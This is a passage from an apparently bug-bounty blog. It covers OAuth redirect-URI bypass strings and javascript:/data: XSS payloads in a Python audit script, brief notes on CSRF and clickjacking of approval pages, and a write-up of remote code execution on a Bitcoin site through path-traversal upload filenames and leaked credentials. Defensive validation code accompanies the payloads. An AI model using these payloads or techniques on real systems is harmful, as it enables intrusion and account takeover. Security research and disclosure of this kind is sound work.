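    """Rules applied once, when the developer registers a redirect URI."""
    parts = urlsplit(uri)
    if parts.scheme not in ALLOWED_SCHEMES:       # rejects javascript:, data:, http:
        return False
    if not parts.hostname or parts.fragment:      # no empty host, no fragment
        return False
    if any(ch in uri for ch in "%\\*"):           # no encoded bytes, backslashes, wildcards
        return False
    return True


def redirect_uri_allowed(candidate, registered=REGISTERED_REDIRECTS):
    """Per-request check: exact string match, no decoding or normalisation."""
    return candidate in registered


PAGE_BYPASSES = [
    "http://example.com%2f%2f.victim.com",
    "http://example.com%5c%5c.victim.com",
    "http://example.com%3F.victim.com",
    "http://example.com%23.victim.com",
    "http://victim.com:80%40example.com",
    "http://victim.com%2eexample.com",
]
# Constructed variants of the page's scheme-based payloads.
SCHEME_PAYLOADS = [
    "javascript://https://example.com/?z=%0Aalert(1)",
    "data:text/html;base64,PHNjcmlwdD5hbGVydCgiWFNTIik8L3NjcmlwdD4=",
]


def audit(candidates):
    """candidate -> (naive accepts?, registration accepts?, exact match accepts?)."""
    return {c: (naive_redirect_check(c), validate_registration(c), redirect_uri_allowed(c))
            for c in candidates}


if __name__ == "__main__":
    for uri, verdict in audit(PAGE_BYPASSES + SCHEME_PAYLOADS).items():
        print(verdict, uri)
```

Exact matching is what the OAuth 2.0 security guidance asks for precisely because every normalisation step (decoding %2f, treating a backslash as a slash, stripping a userinfo part) is a place where the authorization server and the browser can disagree about which host the redirect lands on.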

3 – CSRF 

The client app approval page, where you grant access to a client app, is sometimes vulnerable to CSRF, which can be used by an attacker to force the victim to approve the attacker’s app with some dangerous scope access.

4 – ClickJacking

The client app approval page, where you grant access to a client app, is sometimes vulnerable to ClickJacking, which can be used by an attacker to trick the victim into approving the attacker’s app with some dangerous scope access. Recently 2 of my bugs got validated just like this 😉

These are just some common issues; there are many issues left in oAuth implementations. Find them 😀 and make money 😉


Pwn them for Learn


Hello guys! These days I’m not much active because of college life 🙁 but this weekend I got enough time to write about one of my findings on a
private site 🙂 from which I was able to get Remote Code Execution on the server 🙂

Site : B*******.com
Description : Bitcoin sell and buy site 
Bug : Remote Code Execution

OK, let’s start! First of all, the site’s login system was completely different: they send you an “Access Code” (a 7-digit code) to the registered email whenever you want to log in, and it was running behind Cloudflare.

Playing around uploader : 

After login there was a page to upload documents, which includes ID proof upload, which had unrestricted file upload, but whenever I uploaded PHP and opened it, it was getting downloaded. Then I started messing around with the uploader, and giving it some unsuitable characters gave me a server error which leaked the server’s full path, the upload script path, and the server type (nginx).




Lets Read some files : 

The thing I noticed is that anyfile.js was a script, and node-modules and such things were there (zero knowledge of node.js). Two things were confirmed: nginx and Node.js. But why wasn’t PHP executing, when HTML was executed (which means stored XSS)? But I was looking for RCE. Now, one thing I was missing is that nginx sometimes has problems with uploaders, so I did ../../a.php in the filename, which uploaded a.php to the root directory of the site, but it was still not executing :/ meaning PHP was not configured on the Node.js side. As I said, anyfile.js and its path were there in the debug message, so I opened it and I was fully shocked :O It was a Node.js file with MySQL login (root user 😀 ), SMTP mail login (Gmail, the same email which sends the “Access code”, which means we can do account takeover from here) and publicly accessible 😉



Lets shell :

Doing some more work I was able to read many files, which means I got arbitrary source code read. Now, as I said, Cloudflare: the real IP was not available to me, so I started getting its IP, which landed me at email headers that leaked the server IP. OK, but the MySQL port 3306 was closed (maybe it’s only up on 127.0.0.1, not on 0.0.0.0; the same port was configured in anyfile.js), so I started finding other ports on the same IP, which gave me 2 ports, ip:7788 and ip:8899. ip:8899 was a clone of the site, while ip:7788 had API documentation. By doing some work on the ip:7788 one I got its full path, which was /home/*user*/php/application/file.php 😀 Damn, PHP was configured here. Now I went back to port 8899, which was a clone of the site, used ../../../user/php/a.php and checked it on ip:7788/a.php, and bhoom, PHP executed 😀
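
Both this uploader and the /api/v1/upload endpoint in the Code Execution post accepted a client-supplied filename with ../ segments and wrote wherever it resolved. As an added example (not the site’s code), here is a Python mapping from an untrusted filename to a server-chosen path that cannot leave the upload root: the directory part is discarded, the extension is checked against an allow-list, the stored name is random, and the final path is resolved and checked against the root as a second line of defence. The upload root and the allowed extensions are constructed assumptions; the traversal inputs are the ones used on the page.

```python
import os
import re
import secrets
from pathlib import Path

# Added example, not the site's code. UPLOAD_ROOT and the allowed extensions are
# constructed; the traversal inputs in the tests are the ones used on the page.
UPLOAD_ROOT = "/srv/app/uploads"
ALLOWED_EXT = {".pdf", ".png", ".jpg", ".jpeg"}
_SAFE_CHARS = re.compile(r"[^A-Za-z0-9._-]")


def is_within(root, candidate):
    """True only if candidate resolves to root or somewhere below it."""
    root = Path(root).resolve()
    cand = Path(candidate).resolve()
    return cand == root or root in cand.parents


def safe_upload_path(client_filename, root=UPLOAD_ROOT):
    """Map an untrusted filename to a server-chosen path inside root, or raise."""
    # Strip any directory component, whichever separator the client used.
    base = os.path.basename(client_filename.replace("\\", "/"))
    if base in ("", ".", ".."):
        raise ValueError("empty or relative filename")
    stem, ext = os.path.splitext(base)
    ext = ext.lower()
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension {ext!r} not allowed")
    # Keep a sanitised stem for readability; the unique part is random.
    stem = _SAFE_CHARS.sub("_", stem)[:40] or "file"
    final = Path(root) / f"{stem}-{secrets.token_hex(8)}{ext}"
    if not is_within(root, final):          # belt and braces after the basename strip
        raise ValueError("path escapes upload root")
    return str(final)


def rejects(client_filename):
    """Helper for audits: does the mapping refuse this filename?"""
    try:
        safe_upload_path(client_filename)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    for name in ("id-proof.pdf", "../../a.php", "../../../user/php/a.pdf"):
        print(name, "->", "rejected" if rejects(name) else safe_upload_path(name))
```

The allow-list alone would not have saved this site, since the executing host was a different vhost on the same box; keeping the upload root outside every document root and serving files back with a fixed Content-Type and Content-Disposition is the part of the fix that does not depend on which interpreter happens to be configured where.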



./My reaction : Let’s get into it xD but as a whitehat I can’t; it would violate the program’s policy



./Root cause : 
Uploader misconfigured in 2 ways -> allowed PHP and directory change (most probably because of nginx) — — — Eq. 1 
Leak of the full path of a server which had PHP installed. — — — Eq. 2

By combining Eq. 1 and Eq. 2 : Eq. 1 + Eq. 2 = RCE

./Game Over
./Bounty awarded
./Special Thanks to Waleed, Rahul Maini, Daniel;